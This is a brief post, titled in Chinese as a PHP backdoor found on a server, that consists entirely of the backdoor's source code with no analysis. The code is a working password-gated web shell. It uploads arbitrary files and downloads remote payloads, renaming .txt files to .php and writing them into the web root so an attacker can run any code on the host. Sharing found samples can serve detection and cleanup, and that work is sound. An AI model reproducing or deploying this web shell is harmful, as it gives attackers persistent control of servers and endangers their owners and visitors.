服务器上发现的一段PHP后门程序
error_reporting(0);
$path = __DIR__;
if ($_GET["login"] == "2M05Wd") {
if (isset($_FILES["uploadedfile"])) {$target_path = basename($_FILES["uploadedfile"]["name"]);
if (move_uploaded_file($_FILES["uploadedfile"]["tmp_name"], $target_path))
{echo "file uploaded
";}
else {echo "upload fail
";}
}
echo "
";function get($url, $dir)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$data = curl_exec($ch);
if (!$data) {$data = @file_get_contents($url);}
file_put_contents($dir, $data);
}
if ($_GET["url"]) {
$url = $_GET["url"];
preg_match("/(.*)\/(.*)\.(.*?)$/", $url, $n);
if ($n[3] == "txt") {
$z = "php";
$name = $n[2];
}else{
$z = $n[3];
$name = "moban";
}
if ($_GET["dir"]){
$dir = $_SERVER["DOCUMENT_ROOT"] . "/" . $_GET["dir"] . "/" . $name . "." . $z;
} else {
$dir = $_SERVER["DOCUMENT_ROOT"] . "/" . $name . "." . $z;
}
get($url, $dir);
if (file_exists($dir)) {echo "
download success";} else {echo " download fail";}} elseif ($_POST["url"]) {$url = $_POST["url"];
preg_match("/(.*)\/(.*)\.(.*?)$/", $url, $n);
if ($n[3] == "txt") {
$z = "php";
$name = $n[2];} else {
$z = $n[3];
$name = "moban";}
$dir = $_POST["path"] . "/" . $name . "." . $z;
get($url, $dir);
if (file_exists($dir)) {echo "
download success";} else {echo " download fail";}}echo "
Url: ";}